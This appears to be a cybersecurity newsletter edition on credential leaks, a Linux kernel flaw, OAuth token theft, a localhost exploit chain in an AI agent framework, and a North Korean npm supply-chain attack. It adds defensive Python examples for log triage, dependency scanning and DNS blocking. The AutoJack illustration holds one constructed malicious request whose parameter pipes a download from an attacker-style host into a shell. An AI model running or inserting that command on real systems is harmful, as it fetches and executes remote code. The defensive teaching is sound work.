FACT North Korea stole $1.34 billion in cryptocurrency in 2024, accounting for 61% of all crypto stolen globally that year, across just 47 incidents averaging $28 million per heist. That's not a hacking operation. That's a state revenue program. (Chainalysis 2025 Crypto Crime Report)
The Signal
 

The perimeter isn't leaking; it's already drained. This edition tracks what happened when state actors and criminals stopped probing enterprise defenses and started systematically harvesting the credentials those defenses were supposed to protect.


In this edition
  📌 Big Cyber News
  🚨 Can't Miss
  🤖 AI in Cyber
  🕵️ Threat Intel
  🛠️ Tools & Tactics
  🧪 Strange Cyber
📌 Big Cyber News
 
CREDENTIAL EXPOSURE
Your Fortinet Credentials Are Already Out There
Intro
A publicly exposed server was found holding VPN credentials for roughly 73,000 Fortinet firewalls; organizations named in the dataset include Chevron, Samsung, AT&T, PwC, and a Turkish NATO defense contractor.
What Happened
Security researcher Bob Diachenko found a publicly exposed server containing FortiGate SSL VPN credentials covering 73,932 firewall URLs across 194 countries and 21,632 unique domains. Separately, Russian-speaking threat actors ran roughly 1.16 billion credential attempts against more than 320,000 FortiGate targets, using a 45-GPU cluster to crack SSL VPN password hashes, and then moved laterally into Active Directory environments. Kevin Beaumont and Hudson Rock both confirmed the dataset is genuine.
Why It Matters
This is not a vulnerability disclosure with a patch coming. No CVE has been identified, and the source of the configuration data is still unknown. The attack surface is roughly half of all internet-accessible Fortinet firewalls.
The Other Side
Fortinet confirmed awareness and notes that many exposed credentials may already be inactive. Hudson Rock published a free lookup tool so organizations can check whether their devices appear in the dataset.
 
👉 Takeaway
Rotate every FortiGate SSL VPN and admin interface password now, and because the leaked data is device configuration, treat everything else a FortiGate config carries (LDAP and RADIUS bind credentials, IPsec pre-shared keys, SNMP communities) as exposed too. Enable MFA on the VPN and on admin access. Pull the last 30 days of gateway logs and look for failed-login bursts from a single source, failures naming accounts that don't exist, and successful logins that follow such a burst or arrive from a country or ASN you have never seen. If rotation has to wait, restrict the SSL VPN portal to known source ranges in the meantime. This is a "do it today, not this week" situation.
TL;DR: A leaked dataset covers VPN credentials for 73K Fortinet firewalls, including orgs you've heard of, Russian-speaking actors are cracking FortiGate SSL VPN logins at scale, and there's no patch coming.
Further reading: BleepingComputer
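The log review in the takeaway above, as an added example that is not part of the newsletter or any Fortinet tooling. It runs three checks over FortiGate-style key=value SSL VPN events: a source IP failing against several distinct accounts (spraying a harvested list), failures that name accounts which don't exist (probing a stolen username list), and a successful tunnel that follows a burst of failures from the same source (a cracked credential). The sample lines are constructed, and the field names (type, subtype, action, user, remip, reason) follow the style of FortiGate event logs but are assumptions; confirm them against your own devices before pointing this at a real export.

```python
import re
from collections import defaultdict

# Constructed sample events in FortiGate's key=value style. Field names are an
# assumption for this example, not copied from a real device.
SAMPLE_LOGS = """\
date=2026-06-18 time=09:00:01 type="event" subtype="vpn" action="ssl-login-fail" user="jsmith" remip=198.51.100.7 reason="sslvpn_login_permission_denied"
date=2026-06-18 time=09:00:02 type="event" subtype="vpn" action="ssl-login-fail" user="mjones" remip=198.51.100.7 reason="sslvpn_login_unknown_user"
date=2026-06-18 time=09:00:03 type="event" subtype="vpn" action="ssl-login-fail" user="akhan" remip=198.51.100.7 reason="sslvpn_login_permission_denied"
date=2026-06-18 time=09:00:04 type="event" subtype="vpn" action="ssl-login-fail" user="akhan" remip=198.51.100.7 reason="sslvpn_login_permission_denied"
date=2026-06-18 time=09:00:09 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-tunnel" user="akhan" remip=198.51.100.7
date=2026-06-18 time=09:05:00 type="event" subtype="vpn" action="ssl-login-fail" user="jsmith" remip=203.0.113.5 reason="sslvpn_login_permission_denied"
date=2026-06-18 time=09:05:20 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-tunnel" user="jsmith" remip=203.0.113.5
date=2026-06-18 time=09:10:00 type="event" subtype="vpn" action="tunnel-up" tunneltype="ssl-tunnel" user="bwong" remip=192.0.2.9
"""

# key="quoted value" or key=bare_value
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_line(line):
    """Split one key=value event into a dict; quoted and bare values both work."""
    out = {}
    for m in KV_RE.finditer(line):
        quoted, bare = m.group(2), m.group(3)
        out[m.group(1)] = quoted if quoted is not None else bare
    return out

def triage(log_text, spray_threshold=3):
    """Return three indicator sets. Events are assumed to be in time order."""
    fails_by_ip = defaultdict(list)   # source IP -> users that failed, in order
    unknown_by_ip = defaultdict(int)  # source IP -> failures naming non-existent users
    cracked = []                      # (user, ip) successes preceded by a failure burst
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev.get("type") != "event" or ev.get("subtype") != "vpn":
            continue
        ip, user, action = ev.get("remip"), ev.get("user"), ev.get("action")
        if action == "ssl-login-fail":
            fails_by_ip[ip].append(user)
            if ev.get("reason") == "sslvpn_login_unknown_user":
                unknown_by_ip[ip] += 1
        elif action == "tunnel-up" and len(fails_by_ip.get(ip, [])) >= spray_threshold:
            # A working login right after a burst of failures from the same
            # source is the signature of a harvested or cracked credential.
            cracked.append((user, ip))
    # One source failing against several different accounts is spraying a list.
    spraying = {ip: sorted(set(users)) for ip, users in fails_by_ip.items()
                if len(set(users)) >= spray_threshold}
    return {"spraying_ips": spraying,
            "cracked_logins": cracked,
            "unknown_user_probes": dict(unknown_by_ip)}

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_LOGS).items():
        print(f"{name}: {hits}")
```

A single user mistyping a password once and then succeeding (203.0.113.5 in the sample) stays below the threshold on purpose; tune spray_threshold to your user population, and run the same logic over admin-interface logins, which the leaked configs also cover.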
🚨 Can't Miss
 
 
LAW ENFORCEMENT
International law enforcement cleaned SocGholish (FakeUpdates) from 14,971 compromised WordPress sites and took 106 servers and domains offline as part of Operation Endgame. SocGholish is Evil Corp's calling card, the group behind Zeus, Dridex, and WastedLocker, and it has served as the first-stage foothold for ransomware gangs including LockBit and RansomHub for years. This is the third phase of Operation Endgame, which has now dismantled infrastructure tied to nine major malware families since 2024.
If you run WordPress, check plugin and theme versions, look for injected <script> tags in theme files and in the database, and review recent admin login logs. SocGholish spread primarily through compromised themes and plugins, not the WordPress core.
 
VULNERABILITY
CVE-2026-23111: a single misplaced character in the nf_tables networking module creates a use-after-free bug that lets an unprivileged user escalate to root and escape containers. A working public exploit has been available since April, and Exodus Intelligence published a detailed write-up on June 8. Debian Bookworm/Trixie, Ubuntu 22.04/24.04, and RHEL 10 are all affected. No confirmed in-the-wild exploitation yet, but the exploit code is out and documented in detail.
Update your kernel and reboot. There's nothing subtle about this fix. If you can't reboot yet, restricting unprivileged user namespaces (user.max_user_namespaces=0, or the Debian and Ubuntu equivalents) cuts off the usual route an unprivileged user takes to reach nf_tables, since talking to it needs CAP_NET_ADMIN in some network namespace; that buys time but is not a fix, and it breaks rootless containers and browser sandboxes that rely on user namespaces. Remember that distro kernels backport fixes, so compare package versions against the advisory rather than trusting the upstream version in uname -r.
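A triage helper for the interim mitigation above, added here as an example and not taken from any vendor or distro tooling. It reads the sysctl knobs that decide whether an unprivileged user can enter a user namespace and whether nf_tables is currently loaded, then classifies the host. Two caveats it encodes: an unloaded module is not a mitigation, because nfnetlink autoloads the nf_tables subsystem on first use, and this check says nothing about whether the kernel fix is installed. It also does not cover a container that was granted CAP_NET_ADMIN, which reaches nf_tables regardless of the host's user-namespace policy. The sysctl names are real; the sample values in the usage note are constructed.

```python
from pathlib import Path

# Knobs that decide whether an unprivileged user can create a user namespace,
# which is how such a user normally picks up the CAP_NET_ADMIN needed to send
# nf_tables netlink messages in the first place.
USERNS_SYSCTLS = (
    "user.max_user_namespaces",                      # 0 disables user namespaces outright
    "kernel.unprivileged_userns_clone",              # Debian-patched kernels (older releases)
    "kernel.apparmor_restrict_unprivileged_userns",  # Ubuntu 24.04+ AppArmor gate
)

def read_sysctls(names, root="/proc/sys"):
    """Read sysctl values directly from /proc/sys; knobs this kernel lacks are skipped."""
    values = {}
    for name in names:
        path = Path(root, *name.split("."))
        try:
            values[name] = path.read_text().strip()
        except OSError:
            pass
    return values

def userns_restricted(sysctls):
    """True when at least one knob stops unprivileged users from entering a user namespace."""
    return (sysctls.get("user.max_user_namespaces") == "0"
            or sysctls.get("kernel.unprivileged_userns_clone") == "0"
            or sysctls.get("kernel.apparmor_restrict_unprivileged_userns") == "1")

def nf_tables_loaded(proc_modules_text):
    """True if nf_tables appears in the first column of /proc/modules."""
    return any(line.split()[0] == "nf_tables"
               for line in proc_modules_text.splitlines() if line.strip())

def assess(sysctls, proc_modules_text):
    """Summarise what an unprivileged local user can reach until the kernel is patched.
    This does not tell you whether the fix is installed; compare the distro package
    version with the advisory for that, since backports make uname -r misleading."""
    loaded = nf_tables_loaded(proc_modules_text)
    return {
        "status": "mitigated" if userns_restricted(sysctls) else "exposed",
        "nf_tables_loaded": loaded,
        # An unloaded module is not a mitigation: nfnetlink autoloads the
        # nf_tables subsystem the first time a netlink message asks for it.
        "note": "module already loaded" if loaded else "module autoloads on first use",
    }

def mitigation_commands():
    """Stop-gap until the reboot. It also breaks rootless containers, flatpak and
    browser sandboxes that depend on unprivileged user namespaces."""
    return ["sysctl -w user.max_user_namespaces=0"]

if __name__ == "__main__":
    try:
        modules = Path("/proc/modules").read_text()
    except OSError:
        modules = ""
    verdict = assess(read_sysctls(USERNS_SYSCTLS), modules)
    print(verdict)
    if verdict["status"] == "exposed":
        print("interim mitigation:", *mitigation_commands())
```

Run it as root on each host you can't reboot today; "mitigated" means the unprivileged path to nf_tables is closed, nothing more.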
 
EXTORTION
A new extortion group calling itself Icarus compromised Klue, a competitive intelligence tool that integrates with Salesforce, by pushing an update to Klue's integration code that harvested OAuth tokens. Any org with the Klue-Salesforce connection active had its OAuth tokens exposed, and Icarus has since expanded to similar integrations with HubSpot, SharePoint, Zoom, Gong, and Slack. Salesforce disabled the Klue integration on June 11. Affected organizations are receiving extortion demands via Session Messenger from an operator using the alias "mr bean."
Audit your SaaS OAuth connections. Revoke anything you don't actively use, revoke and re-issue the Klue tokens outright, and check your Salesforce and Slack integration logs for anything touching Klue since April 2026. Revoking a connected app doesn't undo what a stolen token already read, so scope the data each exposed token could reach.
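The OAuth audit above, as an added example that is not from the newsletter, Salesforce or Klue. It buckets an export of connected-app tokens into ones to revoke because they belong to a compromised integration (and, among those, the ones exercised inside the exposure window, whose data you should treat as read), ones to revoke because nobody has used them in 90 days, and ones left for review. The rows are constructed and shaped like Salesforce's OauthToken records (Id, AppName, UserId, LastUsedDate, UseCount), which you can pull with a query along the lines of SELECT Id, AppName, UserId, LastUsedDate, UseCount FROM OauthToken; treat that field list and the April 1 window start as assumptions and adjust them to your export and to the dates in the vendor notice.

```python
from datetime import datetime, timedelta, timezone

# Constructed rows shaped like Salesforce OauthToken records. The shape is an
# assumption for this example; map your real export's columns onto it.
TOKENS = [
    {"Id": "3MV0001", "AppName": "Klue", "UserId": "005A1", "LastUsedDate": "2026-06-09T14:00:00Z", "UseCount": 412},
    {"Id": "3MV0002", "AppName": "Klue", "UserId": "005B2", "LastUsedDate": "2026-03-01T09:00:00Z", "UseCount": 3},
    {"Id": "3MV0003", "AppName": "Gong", "UserId": "005A1", "LastUsedDate": "2026-06-17T08:00:00Z", "UseCount": 90},
    {"Id": "3MV0004", "AppName": "Legacy BI Connector", "UserId": "005C3", "LastUsedDate": "2025-11-20T10:00:00Z", "UseCount": 1},
]

SUSPECT_APPS = {"Klue"}                                      # from the advisory above
EXPOSURE_START = datetime(2026, 4, 1, tzinfo=timezone.utc)   # assumed start of the exposure window
AS_OF = datetime(2026, 6, 19, tzinfo=timezone.utc)           # "now" for the sample run

def _ts(value):
    """Parse the ISO-8601 UTC timestamps the export uses (works before Python 3.11)."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))

def audit(tokens, now, suspect_apps=SUSPECT_APPS, exposure_start=EXPOSURE_START, stale_days=90):
    """Bucket every token: revoke if it belongs to a compromised integration,
    revoke if it has gone unused for stale_days, otherwise keep for review."""
    out = {"revoke_compromised": [], "used_in_window": [], "revoke_stale": [], "review": []}
    for t in tokens:
        last_used = _ts(t["LastUsedDate"])
        if t["AppName"] in suspect_apps:
            out["revoke_compromised"].append(t["Id"])
            if last_used >= exposure_start:
                # Token was exercised while the backdoored code was live: assume it
                # was harvested and treat whatever it could read as accessed.
                out["used_in_window"].append(t["Id"])
        elif now - last_used > timedelta(days=stale_days):
            out["revoke_stale"].append(t["Id"])
        else:
            out["review"].append(t["Id"])
    return out

if __name__ == "__main__":
    for bucket, ids in audit(TOKENS, AS_OF).items():
        print(f"{bucket}: {ids}")
```

Run the same pass over your Slack app tokens and any other platform the group has moved on to; the bucketing logic is the same, only the export shape changes.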


🤖 AI in Cyber
 
 
AI AGENT SECURITY
Microsoft's Defender Security Research Team disclosed AutoJack on June 18: an exploit chain in AutoGen Studio's MCP WebSocket that lets a single malicious web page spawn processes on the host machine. No credentials, no sign-in, no further user interaction after the agent loads the page. The flaw chains three weaknesses: the socket trusts localhost connections (which a browsing agent inherits), authentication middleware skips MCP paths, and the endpoint runs commands from request parameters with no executable allowlist. Affected builds are pre-release PyPI versions 0.4.3.dev1 and 0.4.3.dev2; stable 0.4.2.2 is clean, and no wild exploitation has been reported.
If your team uses pre-release AutoGen Studio builds for agent prototyping, move to the stable 0.4.2.2 release today. AutoJack is less about one bug and more about what happens when AI frameworks bolt on web access without thinking through the security model: a "localhost only" check is not an authentication boundary once the thing on localhost is a browser that loads untrusted pages.
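The three weaknesses in the chain, shown side by side with the closed form, as an added illustration that is not AutoGen Studio's code and does not reproduce the exploit. The vulnerable handler treats a loopback peer as trusted, skips auth on MCP routes, and runs whatever command string the request carries; the hardened one checks the WebSocket Origin header (which a browser always sends and a cross-site page cannot forge), demands a bearer token on every route, and maps tool names to fixed argv with no shell. Neither function executes anything; they return the command they would run. The origin, token, tool table and the request are hypothetical values constructed for the example.

```python
import hmac

# Hypothetical values for this illustration, not AutoGen Studio's configuration.
ALLOWED_ORIGINS = {"http://localhost:8081"}   # the one UI origin allowed to open the socket
API_TOKEN = "replace-with-a-random-per-install-secret"

# Tool name -> fixed argv. Nothing from the request is ever interpreted as a command.
TOOL_ALLOWLIST = {
    "list_workspace": ["ls", "-l", "/workspace"],
    "git_status": ["git", "-C", "/workspace", "status", "--short"],
}

def vulnerable_handler(req):
    """The three weaknesses in the write-up: a loopback peer is treated as trusted,
    MCP routes skip the auth middleware, and the command comes from the request."""
    if req["peer_ip"] != "127.0.0.1":
        return {"status": 403}
    if not req["path"].startswith("/mcp"):
        return {"status": 401}            # auth middleware only guards non-MCP routes
    # The browsing agent lives on this same host, so a page it renders reaches
    # here with peer_ip == 127.0.0.1 exactly like the real UI does.
    return {"status": 200, "exec": req["params"]["command"]}

def hardened_handler(req):
    """Same endpoint with the three gaps closed."""
    headers = req.get("headers", {})
    # 1. Browsers always send Origin on a WebSocket handshake and a cross-site page
    #    cannot forge it, so this stops the page-driven attack no matter which IP
    #    the socket is opened from.
    if headers.get("Origin") not in ALLOWED_ORIGINS:
        return {"status": 403, "reason": "origin"}
    # 2. A per-install bearer token, checked on every route, MCP included.
    supplied = headers.get("Authorization", "")
    if not hmac.compare_digest(supplied.encode(), f"Bearer {API_TOKEN}".encode()):
        return {"status": 401, "reason": "token"}
    # 3. Only named tools with fixed argv; no shell, no caller-supplied strings.
    tool = req.get("params", {}).get("tool")
    if tool not in TOOL_ALLOWLIST:
        return {"status": 400, "reason": "tool"}
    return {"status": 200, "exec": list(TOOL_ALLOWLIST[tool])}

# Constructed request, as a malicious page loaded by a local browsing agent would produce it.
MALICIOUS_PAGE_REQUEST = {
    "peer_ip": "127.0.0.1",
    "path": "/mcp/ws",
    "headers": {"Origin": "https://attacker.example"},
    "params": {"command": "curl https://attacker.example/p | sh"},
}

if __name__ == "__main__":
    print("vulnerable:", vulnerable_handler(MALICIOUS_PAGE_REQUEST))
    print("hardened:  ", hardened_handler(MALICIOUS_PAGE_REQUEST))
```

The Origin check alone is not enough, because non-browser clients can set any Origin they like; the token covers those, and the allowlist means a leaked token still can't turn the socket into a shell.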
 
SUPPLY CHAIN
Sapphire Sleet, North Korea's BlueNoroff financial crime unit, compromised the npm account of a Mastra AI framework maintainer and published backdoored updates to 144 packages in the @mastra scope on June 17, all in 88 minutes. The injected dependency ("easy-day-js," spoofing the legitimate dayjs library) ran an obfuscated postinstall hook, disabled TLS certificate verification, established C2, and deployed a PowerShell backdoor that survived reboots. The second-stage payload hunts 166 cryptocurrency wallet browser extensions on Windows, Linux, and macOS. Mastra's @mastra/core package pulls around 918,000 downloads per week.
If you updated any @mastra packages since June 17, treat the development machine as potentially compromised, follow Mastra's incident response steps on GitHub, and rotate every secret that machine held: npm and cloud tokens, SSH keys, and wallet seeds. North Korea going after AI developer tooling is not a new playbook: it's an escalation of the same crypto-theft operation running since 2017.
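A lockfile sweep for the pattern described above, added as an example and not taken from Mastra's incident response material. It walks a package-lock.json (lockfileVersion 2 or 3, where every installed package sits under "packages" keyed by install path) together with the installed packages' own package.json files, and flags three things: the spoofed dependency name given above, anything resolved from somewhere other than the npm registry, and any package that carries an install-time hook (preinstall, install or postinstall), which is where the backdoor ran. The lockfile and manifests are constructed; every package name except easy-day-js and the @mastra scope, and every version number, is hypothetical.

```python
import json

# Constructed package-lock.json in the lockfileVersion 3 layout. Names other than
# easy-day-js and the @mastra scope, and all version numbers, are hypothetical.
LOCKFILE = json.loads("""
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"dependencies": {"@mastra/core": "^1.0.0"}},
    "node_modules/@mastra/core": {
      "version": "1.0.0",
      "resolved": "https://registry.npmjs.org/@mastra/core/-/core-1.0.0.tgz",
      "dependencies": {"easy-day-js": "^1.0.0"}
    },
    "node_modules/easy-day-js": {
      "version": "1.0.0",
      "resolved": "https://registry.npmjs.org/easy-day-js/-/easy-day-js-1.0.0.tgz",
      "hasInstallScript": true
    },
    "node_modules/dayjs": {
      "version": "1.11.13",
      "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.13.tgz"
    },
    "node_modules/internal-tool": {
      "version": "2.0.0",
      "resolved": "https://packages.example.internal/internal-tool-2.0.0.tgz"
    }
  }
}
""")

# Constructed package.json contents keyed by install path, standing in for
# reading node_modules/<pkg>/package.json from disk.
MANIFESTS = {
    "node_modules/easy-day-js": {"name": "easy-day-js", "scripts": {"postinstall": "node setup.js"}},
    "node_modules/dayjs": {"name": "dayjs", "scripts": {"test": "jest"}},
}

KNOWN_BAD = {"easy-day-js"}                    # the spoofed dayjs dependency named above
TRUSTED_PREFIXES = ("https://registry.npmjs.org/",)
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

def package_name(install_path):
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b' (handles nesting and scopes)."""
    return install_path.rsplit("node_modules/", 1)[-1]

def scan(lock, manifests, known_bad=KNOWN_BAD):
    """Return sorted (package, reason) findings for a lockfile plus installed manifests."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":                         # the root project entry
            continue
        name = package_name(path)
        if name in known_bad:
            findings.append((name, "known-malicious dependency"))
        resolved = meta.get("resolved", "")
        if resolved and not resolved.startswith(TRUSTED_PREFIXES):
            findings.append((name, f"resolved outside the registry: {resolved}"))
        scripts = manifests.get(path, {}).get("scripts", {})
        hooks = [h for h in LIFECYCLE_HOOKS if h in scripts]
        if hooks or meta.get("hasInstallScript"):
            # Install-time hooks are where the backdoor described above executed.
            findings.append((name, "lifecycle script: " + (", ".join(hooks) or "hasInstallScript")))
    return sorted(findings)

if __name__ == "__main__":
    for name, reason in scan(LOCKFILE, MANIFESTS):
        print(f"{name}: {reason}")
```

Lifecycle hooks are common in legitimate native packages, so the third check is a review list rather than a verdict; what matters is a hook appearing in a package that was not there before the update. Installing with npm ci --ignore-scripts on CI runners keeps a hook like this from executing at all, at the cost of packages that genuinely need a build step.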
🕵️ Threat Intel
 
 
NATION-STATE
NCSC CEO Richard Horne told RUSI's Annual Security Lecture on June 17 that his teams handled over 200 incidents affecting UK critical infrastructure in the past year, and roughly three-quarters are attributed to state actors. That works out to four nationally significant cyber incidents every week. He named Volt Typhoon's prepositioning activity explicitly, called AI tools "highly likely" to exploit vulnerabilities in aging infrastructure by 2028, and put it plainly: "In cyberspace we are not preparing for tomorrow's conflicts. To some degree we are fighting them today."
If you're in critical infrastructure or supply to it, treat prepositioning as your actual threat model, not just active intrusion. The UK numbers are a proxy for what's happening everywhere.
 
ACTIVE EXPLOITATION
Three FortiSandbox CVEs (CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089, all CVSS 9.1) are under active exploitation. The newest, CVE-2026-25089, was patched June 10 and saw active exploitation within 24 hours. Threat intelligence firm Defused Cyber found that the exploit for CVE-2026-25089 shows signs of AI development: it worked in standard conditions but failed on edge cases, which is consistent with AI-generated code that handles happy paths and falls apart under pressure. Notably, FortiSandbox is Fortinet's enterprise malware analysis product, and the irony of attackers using AI to break a security tool is not subtle.
Patch FortiSandbox now. CVE-2026-39813 and CVE-2026-39808 have been exploitable since April, and if you haven't addressed those, you have three critical RCE vulnerabilities to remediate today.
🛠️ Tools & Tactics
 
 
Practical play
June's Patch Tuesday delivered 200 vulnerabilities (33 Critical, 6 zero-days including the YellowKey BitLocker bypass and GreenPlasma CTFMON privilege escalation), but the most time-sensitive item isn't a vulnerability. The 2011 Secure Boot certificate authority expires June 26. UEFI firmware doesn't check certificate expiry at boot, so endpoints that miss the new certificate update keep booting, but they silently stop receiving Secure Boot updates: boot managers signed by the 2023 CA and future DBX revocations will no longer apply, with no error, no warning, and no indication anything changed. This affects Windows endpoints that haven't received the relevant KB through Windows Update or WSUS.
Run Confirm-SecureBootUEFI in PowerShell to confirm Secure Boot is on, then dump the DB variable with Get-SecureBootUEFI -Name db and check that its bytes contain the string "Windows UEFI CA 2023"; Secure Boot being enabled says nothing about whether the new CA has landed. Verify your WSUS or Intune policies are distributing the new cert KB, and treat this as a four-day countdown starting now.


🧪 Strange Cyber
 
Strange but real
Your Smart TV Is Quietly Renting Out Your Internet Connection to AI
Intro
Free smart TV apps have a business model you didn't agree to, but technically consented to somewhere in a settings screen you didn't read.
What Happened
Bright Data (formerly Luminati, the company that operates the world's largest residential proxy network with 400+ million IPs) embeds its SDK into free TV apps including Petflix on Roku, PlayWorks Digital, CloudTV, and Longvision. When those apps run, your smart TV becomes a relay node for web scraping traffic. The SDK configuration allows up to 200 GB of your home internet connection per month. Researchers from Include Security found that the channel handling those scraping jobs uses "none of the usual security checks": the authentication relies only on a public app ID and version number, which Bright Data publishes openly.
Why It Matters
Your home IP address is laundering web scraping requests for AI training pipelines, bypassing the rate limits and anti-bot systems on whatever sites are being scraped. Smart TVs are ideal targets: always on, fast home connections, effectively unmetered, and almost never monitored.
The Other Side
Bright Data argues users consent via opt-in screens and that average usage is about 50 MB per day, well under the 200 GB maximum. The opt-in text says usage will occur "occasionally." The SDK config says 200 GB.
 
👉 Takeaway
Block these domains at your router or Pi-hole: proxyjs.brdtnet.com, proxyjs.luminatinet.com, proxyjs.bright-sdk.com, and check your resolver's query log for devices that have already looked them up. If you have a smart TV running free apps, assume it's participating unless you've explicitly blocked those endpoints.
TL;DR: Free TV apps rent your home internet to AI companies without telling you clearly, and the authentication protecting that access is embarrassingly weak.
Further reading: The Hacker News
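The "is anything on my network already doing this" check from the takeaway, as an added example that is not from the newsletter, Pi-hole or Bright Data. It reads the dnsmasq-format query log Pi-hole keeps in /var/log/pihole.log, lists every client that resolved one of the three SDK domains (or a subdomain of one), and emits the dnsmasq rules that make those names return NXDOMAIN. The log lines are constructed; the three domains come from the story above.

```python
import re
from collections import Counter, defaultdict

# The SDK endpoints named in the story above.
BRIGHT_SDK_DOMAINS = ("proxyjs.brdtnet.com", "proxyjs.luminatinet.com", "proxyjs.bright-sdk.com")

# Constructed lines in the dnsmasq format Pi-hole writes to /var/log/pihole.log.
SAMPLE_LOG = """\
Jun 18 20:01:02 dnsmasq[612]: query[A] proxyjs.brdtnet.com from 192.168.1.42
Jun 18 20:01:02 dnsmasq[612]: forwarded proxyjs.brdtnet.com to 1.1.1.1
Jun 18 20:01:03 dnsmasq[612]: query[AAAA] proxyjs.bright-sdk.com from 192.168.1.42
Jun 18 20:02:10 dnsmasq[612]: query[A] api.example-streaming.tv from 192.168.1.42
Jun 18 20:03:44 dnsmasq[612]: query[A] proxyjs.brdtnet.com from 192.168.1.42
Jun 18 20:04:00 dnsmasq[612]: query[A] www.wikipedia.org from 192.168.1.10
Jun 18 20:05:12 dnsmasq[612]: query[A] cdn.proxyjs.luminatinet.com from 192.168.1.77
"""

# Only "query[...]" lines identify the asking client; forwarded/reply lines don't.
QUERY_RE = re.compile(r"query\[(\w+)\] (\S+) from (\S+)")

def matches(qname, blocked):
    """True if qname is one of the blocked names or lies underneath one of them."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in blocked)

def clients_hitting(log_text, blocked=BRIGHT_SDK_DOMAINS):
    """Map each client IP to the blocked names it looked up and how often."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and matches(m.group(2), blocked):
            hits[m.group(3)][m.group(2).lower().rstrip(".")] += 1
    return {client: dict(counts) for client, counts in hits.items()}

def dnsmasq_block_rules(blocked=BRIGHT_SDK_DOMAINS):
    """address=/name/ with no address makes dnsmasq answer NXDOMAIN for the name
    and everything below it; drop these into a file under /etc/dnsmasq.d/."""
    return [f"address=/{d}/" for d in blocked]

if __name__ == "__main__":
    for client, counts in clients_hitting(SAMPLE_LOG).items():
        print(client, counts)
    print("\n".join(dnsmasq_block_rules()))
```

A client that shows up here is a device that had the SDK active at the time of the lookup, so after blocking, watch for it moving to a new hostname rather than assuming the problem is closed.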

